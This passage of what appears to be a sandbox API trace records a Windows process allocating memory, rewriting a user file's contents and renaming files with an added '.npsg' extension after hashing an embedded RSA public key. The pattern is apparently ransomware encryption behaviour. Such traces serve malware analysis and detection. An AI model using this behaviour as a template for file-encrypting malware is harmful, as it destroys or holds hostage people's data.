(HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0242.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0242.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0242.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89018 [0242.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0242.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0242.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0242.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fe8 [0242.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0242.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89078 [0242.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0242.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0242.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0242.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89048 [0242.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0242.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89030 [0242.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0242.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89090 [0242.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0242.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89030 [0242.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89048 | out: hHeap=0x620000) returned 1 [0242.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0242.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0242.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0242.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0242.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0242.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0242.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89000 [0242.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0242.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0242.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0242.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bc90 [0242.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89090 | out: hHeap=0x620000) returned 1 [0242.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0242.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0242.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0242.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0242.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0242.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0242.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0242.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0242.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0242.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0242.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89078 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89018 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0242.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fbf8 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0242.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0242.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0242.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0242.447] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x25800, lpOverlapped=0x0) returned 1 [0242.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0242.448] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x182ac2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.448] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0242.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0242.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0242.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0242.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0242.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0242.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0242.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0242.449] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0242.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0242.449] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0242.449] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0242.449] CloseHandle (hObject=0x644) returned 1 [0244.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d868 [0244.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b8ccd0 [0244.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d868 | out: hHeap=0x620000) returned 1 [0244.487] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.npsg")) returned 1 [0244.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0244.492] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0244.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0244.494] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 1 [0244.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e398 [0244.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0244.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e398 | out: hHeap=0x620000) returned 1 [0244.494] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned=".msi" [0244.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0244.497] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=906752) returned 1 [0244.497] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0244.499] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xdd5da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.499] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0244.508] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0244.508] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x25805, lpOverlapped=0x0) returned 1 [0244.511] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0244.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0244.511] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0244.511] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0244.511] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0244.514] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0244.514] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0244.514] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0244.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0244.514] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0244.514] GetLastError () returned 0x0 [0244.514] CryptDestroyHash (hHash=0x33f0488) returned 1 [0244.514] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0244.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0244.514] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0244.514] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0244.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0244.514] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0244.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0244.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0244.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25810) returned 0x3b95d50 [0244.515] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0244.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0244.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0244.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0244.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0244.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0244.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d75a8 [0244.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33cf7a8 [0244.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7998 [0244.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33cf9b8 [0244.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fd0 [0244.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fe8 [0244.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89018 [0244.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0244.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0244.523] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0244.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ccd0 [0244.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0244.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89018 | out: hHeap=0x620000) returned 1 [0244.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0244.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0244.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fe8 [0244.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x33734f8 [0244.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89018 [0244.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0244.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88fd0 [0244.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0244.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0244.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0244.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0244.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0244.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0244.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0244.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0244.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0244.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89018 | out: hHeap=0x620000) returned 1 [0244.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0244.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0244.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0244.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0244.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0244.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0244.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0244.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0244.533] GetCurrentThreadId () returned 0x5b4 [0244.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0244.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x687700 [0244.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0244.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0244.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0244.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0244.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0244.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0244.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0244.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0244.557] GetCurrentThreadId () returned 0x5b4 [0244.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0244.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0244.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0244.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0244.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0244.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0244.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fe8 [0244.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0244.558] RtlAllocateHeap (HeapHandle=0x620000, 